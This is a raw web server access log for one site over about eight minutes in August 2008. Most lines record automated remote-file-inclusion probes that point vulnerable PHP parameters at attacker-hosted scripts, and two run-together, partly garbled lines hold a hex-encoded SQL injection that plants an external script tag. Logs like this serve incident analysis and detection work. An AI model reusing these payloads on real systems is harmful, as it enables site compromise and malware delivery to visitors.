69.64.79.59 - - [19/Aug/2008:09:26:49 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:26:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.36 - - [19/Aug/2008:09:26:50 -0700] "GET /funny/?N=D HTTP/1.1" 200 808 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:26:58 -0700] "GET /bikes/GPS/?S=A HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:27:41 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:27:45 -0700] "GET //index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 200 9887 "-" "libwww-perl/5.803" "www.dmulk.com"
76.9.3.130 - - [19/Aug/2008:09:27:47 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
76.9.3.130 - - [19/Aug/2008:09:27:47 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://aocbots.com/cms/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:27:48 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:28:09 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:28:09 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:28:18 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:28:32 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:28:32 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:28:32 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:28:36 -0700] "GET /logs/access_080222.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:28:39 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:28:39 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:28:40 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
96.239.232.62 - - [19/Aug/2008:09:28:45 -0700] "GET /logs/access_080728.log?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432whopdonmysnowman/us2:13296.239.232.62 - - [19/Aug/2008:09:28:45 -0700] "GET /logs/access_080728.log?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B4043rufus0220/us1:207.191.1069.64.79.59 - - [19/Aug/2008:09:28:50 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:29:10 -0700] "GET /logs/access_080219.log//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:29:10 -0700] "GET //vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:29:10 -0700] "GET /logs//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:29:11 -0700] "GET /logs/access_080730.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:29:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:29:12 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:29:15 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:29:15 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.129.97.30 - - [19/Aug/2008:09:29:18 -0700] "GET /logs/access_080218.log//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:29:28 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:29:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:29:31 -0700] "GET /logs/access_080725.log//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:29:35 -0700] "GET //mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:29:36 -0700] "GET /logs/access_080524.log//index.php?option=com_custompages&cpage=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:29:54 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:09:30:01 -0700] "GET /logs//convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.236.10.71 - - [19/Aug/2008:09:30:02 -0700] "GET //convert/mvcw_conver.php?step=1&vwar_root=http://pediatric-neurology-paris.net/media/install_41aca995b9171/patch/includes/vsc/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:30:02 -0700] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [19/Aug/2008:09:30:03 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://mykonos.bargaingreece.com//components/com_log/sefe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:30:27 -0700] "GET /logs/access_080208.log//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:30:28 -0700] "GET //mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:30:37 -0700] "GET /logs/access_080807.log%20//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.13.168.195 - - [19/Aug/2008:09:30:37 -0700] "GET /logs/access_080725.log%20//vwar/backup/errors.php?error=http://www.saren-first.com/images/n.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:30:44 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:30:44 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:30:44 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.203.121.1 - - [19/Aug/2008:09:30:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:30:51 -0700] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:30:53 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:30:53 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:30:55 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:11 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:11 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:13 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:13 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.106 - - [19/Aug/2008:09:31:20 -0700] "GET /logs/access_080626.log/phpSecurePages/secure.php?&cfgProgDir=http://www.gugn.ru/news/data/archives/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:09:31:25 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:09:31:25 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:34 -0700] "GET /logs//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:34 -0700] "GET /logs//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:34 -0700] "GET //mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:35 -0700] "GET //mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:31:52 -0700] "GET /logs/access_080215.log//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:31:54 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:09:31:54 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:32:11 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.9 - - [19/Aug/2008:09:32:12 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:32:12 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:32:12 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:32:12 -0700] "GET /phphtml.php?htmlclass_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:32:12 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [19/Aug/2008:09:32:13 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.hatcon.com.sa/images/log?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:32:13 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.25.160.1 - - [19/Aug/2008:09:32:13 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://bugise.com/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:32:14 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:32:15 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:32:15 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:32:40 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:32:40 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:32:42 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:32:42 -0700] "GET /logs/phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:32:42 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:32:45 -0700] "GET /logs/access_080630.log/phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:32:47 -0700] "GET /logs//mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:09:32:47 -0700] "GET //mcf.php?content=http://idar.no-ip.org/sanmateo/images/admin/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:32:52 -0700] "GET /logs/access_080809.log/errors.php?error=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:32:52 -0700] "GET /errors.php?error=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.61.106.55 - - [19/Aug/2008:09:32:53 -0700] "GET /logs/errors.php?error=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.30 - - [19/Aug/2008:09:32:54 -0700] "GET /minamijewelry/?D=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [19/Aug/2008:09:32:54 -0700] "GET /minamijewelry/?D=D HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [19/Aug/2008:09:32:54 -0700] "GET /warboard/ HTTP/1.1" 401 395 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:33:02 -0700] "GET /logs/access_080208.log//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:33:02 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:33:02 -0700] "GET //mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:33:02 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.46.23.105 - - [19/Aug/2008:09:33:02 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.ulisse-bici.org/tb1tl33.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:33:03 -0700] "GET /logs//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.79.59 - - [19/Aug/2008:09:33:03 -0700] "GET /logs/access_080215.log//mcf.php?content=http://yoda3000.de/cache/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:33:04 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.191 - - [19/Aug/2008:09:33:04 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:33:33 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:33:33 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:33:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.153.33.182 - - [19/Aug/2008:09:33:34 -0700] "GET /logs/access_071216.log//admin/spaw/spaw_control.class.php?spaw_root=http://h1.ripway.com/wilna/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.37.178 - - [19/Aug/2008:09:33:35 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:09:34:04 -0700] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.254.184.38 - - [19/Aug/2008:09:34:16 -0700] "GET /logs/access_080630.log%20/phpSecurePages/secure.php?&cfgProgDir=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
